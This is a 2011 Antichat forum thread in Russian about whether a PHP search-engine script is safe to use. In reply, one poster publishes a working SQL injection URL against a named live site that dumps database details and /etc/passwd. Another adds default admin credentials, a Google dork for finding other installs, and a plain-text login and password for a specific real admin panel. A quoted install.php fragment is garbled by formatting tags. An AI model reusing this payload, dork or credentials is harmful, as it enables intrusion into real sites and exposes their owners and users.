ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Стоит ли использовать эту cms (https://forum.antichat.xyz/showthread.php?t=298944)

naPrikole 18.10.2011 18:16

народ мне нужно ваше мнение стоит ли использовать вот http://magicsearch.pp.ua cms вот ДЕМО ой сори эт наверно не cms а скрипт

HIMIKAT 18.10.2011 19:25

По ссылке даже не переходил, но уже одно то, что сайт на фришном домене, дает как минимум 50%, что это какая-то хренатень.

Exandr 18.10.2011 19:40

А там написано скрипт поисковой ситемы) причем тут CMS

Boolean 18.10.2011 19:47

Oops..

Need: magic_quotes =Off

install.php

[PHP]
[COLOR="#000000"][...]

if(isset($_POST['go_ed'])) {

if (!is_writable("settings/database.php")) {

print "Файла database.php несуществует или незаданы права доступа 666";

} else {

$fhandle=fopen("settings/database.php","w");

fwrite($fhandle,"[COLOR="#0000BB"]

Boolean 18.10.2011 21:34

http://23rus.sytes.net/static.php?str='+and+1=2+union+select+1,2,concat_w s(0x3a,version(),user(),database()),LOAD_FILE('/etc/passwd')+--+

Сноси в общем.

Код писала курица.

p.s. не юзай юзера root. у него FILE_PRIV как минимум включен, и имеет он доступ ко всем базам данных.

vaddd 18.10.2011 21:53

Цитата:

Сообщение от Boolean
http://23rus.sytes.net/static.php?str='+and+1=2+union+select+1,2,concat_w s(0x3a,version(),user(),database()),LOAD_FILE('/etc/passwd')+--+
Сноси в общем.
Код писала курица.
p.s. не юзай юзера root. у него FILE_PRIV как минимум включен, и имеет он доступ ко всем базам данных.

на многих сайтах логин/пароль - moders

админка - /admin/

Google Dork:"Created by Kiria-Studio"

http://search.afu-time.com/admin/index.php - sorokin96:25101996 (не тот ли это кирил - разработчик? )

naPrikole 19.10.2011 01:49

Цитата:

Сообщение от Exandr
А там написано скрипт поисковой ситемы) причем тут CMS

да эт я чуток попутал

naPrikole 19.10.2011 01:51

[QUOTE="Boolean"]
Oops..
Need: magic_quotes =Off
install.php
[PHP]
[COLOR="#000000"][...]

if(isset($_POST['go_ed'])) {

if (!is_writable("settings/database.php")) {

print "Файла database.php несуществует или незаданы права доступа 666";

} else {

$fhandle=fopen("settings/database.php","w");

fwrite($fhandle,"[COLOR="#0000BB"]Файла database.php несуществует или незаданы права досту па 666";

} else {

$fhandle=fopen("settings/database.php","w");

fwrite($fhandle,"[COLOR="#0000BB"]

naPrikole 19.10.2011 01:55

Цитата:

Сообщение от HIMIKAT
По ссылке даже не переходил, но уже одно то, что сайт на фришном домене, дает как минимум 50%, что это какая-то хренатень.

ясен хрен он фришный я же на своем компе сайт повесил

Letcher 10.11.2011 22:56

всмысле на своем компе? на сервере?


Время: 20:39